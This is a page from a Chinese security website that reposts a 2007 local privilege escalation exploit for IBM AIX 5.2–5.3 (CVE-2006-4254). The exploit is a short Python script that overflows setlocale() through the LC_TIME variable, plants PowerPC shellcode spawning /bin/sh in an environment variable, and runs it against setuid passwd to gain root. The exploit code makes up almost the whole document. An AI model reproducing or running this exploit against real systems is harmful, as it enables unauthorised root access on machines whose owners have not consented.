首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit 来源：caughq.org 作者：intropy 发布时间：2007-11-07   # #setlocale() exploit for aix 5.2 ( CVE-2006-4254  ) #thomas.pollet@gmail.com # from os import execve bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"*2350 shellcode=(            # by intropy <at> caughq.org "\x7c\xa5\x2a\x79"     # xor.    r5,r5,r5 "\x40\x82\xff\xfd"     # bnel    <shellcode> "\x7f\xe8\x02\xa6"     # mflr    r31 "\x3b\xff\x01\x20"     # cal     r31,0x120(r31) "\x38\x7f\xff\x08"     # cal     r3,-248(r31) "\x38\x9f\xff\x10"     # cal     r4,-240(r31) "\x90\x7f\xff\x10"     # st      r3,-240(r31) "\x90\xbf\xff\x14"     # st      r5,-236(r31) "\x88\x5f\xff\x0f"     # lbz     r2,-241(r31) "\x98\xbf\xff\x0f"     # stb     r5,-241(r31) "\x4c\xc6\x33\x42"     # crorc   cr6,cr6,cr6 "\x44\xff\xff\x02"     # svca "/bin/sh" "\x05") execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Viewpoint Media Player for IE ·Adobe Shockwave ShockwaveVersi ·BC Explorer <= 7.20 RC 1 Remot ·MySQL <= 5.0.45 (Alter) Denial ·SonicWall SSL-VPN NeLaunchCtrl ·Microsoft Internet Explorer TI ·PHP-AGTC membership system 1.1 ·迅雷5又（这次怎么多了一个又字 ·Kodak Image Viewer TIF/TIFF Co ·Apple Mac OS X 10.4.x Kernel i ·Sony CONNECT Player 4.x (m3u F ·IceBB 1.0-rc6 Remote Database   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved